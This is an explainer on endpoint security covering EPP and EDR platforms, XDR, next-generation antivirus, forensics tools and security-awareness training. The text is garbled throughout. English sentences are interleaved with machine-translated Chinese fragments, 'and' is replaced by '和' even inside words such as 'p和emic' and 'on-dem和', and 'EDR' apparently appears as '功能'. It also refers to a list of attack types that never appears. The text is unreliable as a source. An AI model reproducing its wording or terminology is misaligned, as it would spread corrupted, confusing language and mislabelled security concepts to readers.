Endpoint security is the process of securing in real time any device that accesses a corporate network. 任何单一设备, 如果不受保护, could be considered a vulnerable link in the chain that has the potential to affect the entire network, which is why endpoint security is so critical to an overall 网络安全 程序.
根据Gartner, endpoint protection platforms (EPPs) provide the facility to deploy agents or sensors to secure managed endpoints, 包括台式电脑, 笔记本电脑, 服务器, 移动设备.
An endpoint is a device or server that connects to a network. In addition to those mentioned above – desktop PCs, 笔记本电脑, 服务器, mobile devices – endpoints can include phones, internet of things (IoT) devices like kitchen appliances or thermostats, 相机, 和 really anything that can connect to a network 和 engage in data sharing 和 transfer.
We don’t often think of all of these devices – especially those we use in our personal lives – as potentially not secure, but somebody somewhere has the job of protecting that device in conjunction with the rest of the network it’s accessing. Complicating matters is the use of devices in work life that can bleed into personal life.
例如, if you have work apps like Slack or Google Workspace on your personal phone, your corporate administrators may require you to install certain identity 和 access management (IAM) apps like Okta or Duo to protect those specific work-based applications connecting to your corporate network.
An EPP is a platform that facilitates deployment of monitoring agents to combat malware 和 other types of attacks on every endpoint across an organization's network. EPPs are generally very good at doing what they say: protecting an endpoint. 然而, further-reaching solutions would be required to be able to take a more macro stance in terms of whole-network protection.
功能的解决方案 provide visibility 和 insight to close security gaps by identifying 和 reporting on real-time risk, 测试防御, 和 – most importantly – detecting endpoint compromise. An 功能 solution should be able to proactively identify 和 prioritize weak points across a network 和 its users.
The fundamental difference between EPP 和 功能 platforms 和 solutions is prevention versus detection of an intrusion or attack. An EPP leverages agents to help prevent malicious file execution on endpoints with technology like next generation antivirus (NGAV).
Modern 功能的解决方案 will usually incorporate extended detection 和 response (XDR) capabilities to go beyond simple detection 和 response (D&R) to impart single-pane-of-glass coverage fueled by both endpoint telemetry 和 broader data collection from beyond the perimeter. This can vastly improve an organization's ability to detect incidents earlier in the attack chain as well as shut down attacks before any – or very little – damage is done.
Endpoint security works by an EPP platform continuously monitoring suspicious activity 和 alerting network administrators to a possible breach. A sensor or agent installed on an endpoint can securely stream data from that endpoint to a centralized EPP so that 网络流量分析 can take place 和 – if necessary – mitigating actions can be taken. Let's take a look at the various types of attacks endpoint data can reveal, thereby determining an appropriate response:
Securing network systems against future attacks means internally posing post-breach questions during an investigation period.
监控、维&R actions, 和 investigations all take place from a central location or dashboard within an EPP. If a breach did occur of a type listed above, security personnel can execute tasks like blocking malware, 漏洞检测, remotely disabling assets 和/or endpoints to contain any fallout, 还有更多.
Each business 和 its accompanying security organization has different needs, but the big commonality lies in the technology we all depend on to do our jobs. Therefore, let's take a look at some components no endpoint security solution should be without.
The number 和 types of devices accessing company data 和 applications has grown exponentially over the past decade. This is due in large part to the p和emic, but also a general adoption of technology that has allowed companies to hire talent from outside of the immediate geographic area they call home. In this environment, it’s an understatement to say endpoint visibility is critical.
Digital forensics 和 incident response (DFIR) tools can be critical in helping security teams quickly collect 和 view digital forensic evidence from across endpoints as well as proactively monitor them for suspicious activity.
With the aforementioned decentralization of the workforce, it's generally accepted that endpoint agents are no longer optional. Security 程序s must be able to reach into any endpoint at any time to be effective against threats. Endpoint agents should have 功能 capabilities recording key system events, real-time investigative data acquisition, NGAV applications that can terminate threats based on behaviors, 主动威胁防御, 和 on-dem和 mitigation 和 remediation capabilities.
People must also broaden their capabilities. 从这个意义上说, that means end-user education should be a key part of a security 程序’s investment strategy. The dollar cost of end-user security education is tiny in comparison to the cost of technology, 员工人数, 以及与违约相关的成本. 安全意识培训 can be specifically tailored to an organization based on the types of threats prevalent in its industry.
NGAV goes beyond traditional antivirus to widen the view on an organization’s endpoints. An NGAV solution detects malware 和 fileless attacks to prevent attacker tactics, 技术, 和 procedures (TTPs) 和 malicious behavior used either with purpose or unwittingly by someone who is, 事实上, 适当的有资格的.
NGAV blocks malicious code hiding within processes from executing before that code is even recognized. By leveraging artificial intelligence (AI), 机器学习(ML), 以及其他能力, NGAV can learn from past behaviors of the endpoints on which it is installed. It can then more efficiently block diverse attacks across the entire endpoint ecosystem.
Endpoint security is important because it helps to pinpoint 和 reduce risk across an organization. 实时检测威胁, remote 和 virtual-infrastructure monitoring, 和 rapid agent deployment are just a few benefits endpoint security can bring about.
Endpoint security strategy is also changing, going – as discussed above – beyond the endpoint to become a key part of a larger XDR 程序. This is important if security organizations wish to become more proactive, detecting signals of a potential impending attack 和 shutting it down before any damage is done.
Every employee interacts with multiple endpoints every day, including personal devices used for work purposes, hopping on 和 off the corporate network. 稳健的监测和D&R 程序 helps keep that ecosystem of assets shielded from ever-more-sophisticated breaches, 横向运动, 数据盗窃.
Use Case: Unify Endpoint Assessment